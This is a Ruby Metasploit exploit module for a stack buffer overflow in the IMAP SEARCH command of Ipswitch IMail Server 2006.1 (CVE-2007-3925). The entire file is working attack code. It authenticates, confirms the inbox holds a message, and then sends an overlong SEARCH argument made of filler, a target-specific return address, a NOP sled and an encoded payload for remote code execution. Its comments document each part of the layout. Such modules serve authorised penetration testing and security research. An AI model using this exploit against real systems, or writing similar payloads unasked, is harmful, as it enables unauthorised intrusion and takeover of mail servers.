Path: blob/master/modules/exploits/windows/imap/ipswitch_search.rb
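##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Ipswitch IMail Server 2006.1 IMAP SEARCH stack buffer overflow (CVE-2007-3925).
#
# Flow: authenticate via the Imap mixin, SELECT INBOX, confirm the mailbox is
# not empty (the overflow only matters when SEARCH has a message to evaluate,
# per the Description), then send an overlong `SEARCH BEFORE <...>` argument
# whose layout is filler | return address | NOP sled | payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Imap

  # Untagged `* N EXISTS` line in a SELECT response (RFC 3501 section 6.3.1).
  # Used only to verify the "at least one message" precondition.
  EXISTS_RE = /\*\s+(\d+)\s+EXISTS/i

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ipswitch IMail IMAP SEARCH Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH
          verb. By sending an overly long string, an attacker can overwrite the
          buffer and control program execution.
          In order for this module to be successful, the IMAP user must have at least one
          message.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-3925' ],
          [ 'OSVDB', '36219' ],
          [ 'BID', '24962' ],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          # Room available after the return address and NOP sled.
          'Space' => 400,
          # NUL, CR/LF and the remaining IMAP whitespace/control characters
          # would terminate or mangle the SEARCH argument.
          'BadChars' => "\x00\x0a\x0d\x20\x0b\x09\x0c",
          # x86: add esp, -0x1001 ; inc esp  => esp -= 0x1000, so the decoder
          # stub's own stack writes land below the in-place payload.
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
        'Platform' => 'win',
        # 'Ret' is the dword written at offset 87 of the SEARCH argument;
        # presumably a jmp/call esp-style gadget for each OS build - confirm
        # before adding targets.
        'Targets' => [
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77f81be3 } ],
          [ 'Windows 2003 SP0 English', { 'Ret' => 0x77c5cee8 } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2007-07-18',
        # Not yet assessed; these are the framework placeholders.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Runs the exploit against the configured target.
  #
  # Aborts via fail_with (instead of falling through to the handler as the
  # original did) when the IMAP login fails or when the server reports an
  # empty INBOX. The connection is closed before every abort.
  def exploit
    request = build_search_request

    # connect_login comes from the Imap mixin and is expected to be true only
    # for an authenticated session.
    unless connect_login
      disconnect
      fail_with(Failure::NoAccess, 'IMAP login failed; not sending the SEARCH overflow')
    end

    print_status("Trying target #{target.name}...")
    sock.put("a001 SELECT INBOX\r\n")
    select_response = sock.get_once(-1, 3)

    if inbox_empty?(select_response)
      disconnect
      fail_with(Failure::BadConfig, 'INBOX is empty; the SEARCH overflow requires at least one message')
    end

    sock.put(request + "\r\n")

    handler
    disconnect
  end

  private

  # Builds the malicious SEARCH command (without the trailing CRLF).
  #
  # Layout of the bracketed argument:
  #   87 bytes of random filler | target.ret as little-endian dword |
  #   20-byte NOP sled | encoded payload | closing '>'
  def build_search_request
    [
      'a002 SEARCH BEFORE <',
      rand_text_english(87),
      [target.ret].pack('V'),
      make_nops(20),
      payload.encoded,
      '>'
    ].join
  end

  # Returns true only when the SELECT response carries an EXISTS count of 0.
  #
  # When no EXISTS line can be parsed (nil/short response within the 3s read
  # window) the precondition is left unverified and the exploit proceeds, as
  # the original module always did; a warning is printed in that case.
  def inbox_empty?(response)
    match = response.to_s.match(EXISTS_RE)
    unless match
      print_warning('Could not parse an EXISTS count from the SELECT response; proceeding anyway')
      return false
    end

    count = match[1].to_i
    vprint_status("INBOX reports #{count} message(s)")
    count.zero?
  end
end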